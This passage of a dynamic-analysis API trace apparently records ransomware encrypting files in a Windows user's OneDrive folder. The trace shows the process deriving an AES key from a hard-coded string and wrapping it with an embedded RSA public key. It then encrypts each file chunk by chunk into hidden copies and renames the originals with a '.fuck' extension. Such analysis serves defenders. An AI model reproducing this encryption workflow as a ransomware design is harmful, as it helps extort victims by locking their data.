hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xc0, lpOverlapped=0x0) returned 1 [0270.918] CloseHandle (hObject=0x5d3c) returned 1 [0270.918] CloseHandle (hObject=0x5d48) returned 1 [0270.919] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png"), bFailIfExists=0) returned 1 [0270.923] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png", dwFileAttributes=0x0) returned 1 [0270.924] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png.gsg")) returned 1 [0270.925] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png.fuck")) returned 1 [0270.928] CryptDestroyHash (hHash=0x2fa2c8) returned 1 [0270.928] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0270.928] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.928] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.928] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.928] GetLastError () returned 0x0 [0270.928] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif")) returned 0x20 [0270.929] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif", dwFileAttributes=0x80) returned 1 [0270.930] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.931] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.932] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.gsg", dwFileAttributes=0x2) returned 1 [0270.932] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.936] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.937] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0270.937] CryptHashData (hHash=0x2fa348, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.937] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa348, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa608) returned 1 [0270.937] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.937] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.937] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27330) returned 1 [0270.937] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27330, dwCertEncodingType=0x1, pInfo=0x2f32770*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f327a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f327a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa2c8) returned 1 [0270.937] CryptEncrypt (in: hKey=0x2fa2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.937] CryptEncrypt (in: hKey=0x2fa2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26e68*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26e68*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f26e68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26e68*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.974] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.974] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.978] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.979] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.007] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.007] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.007] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.008] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.010] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.011] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, 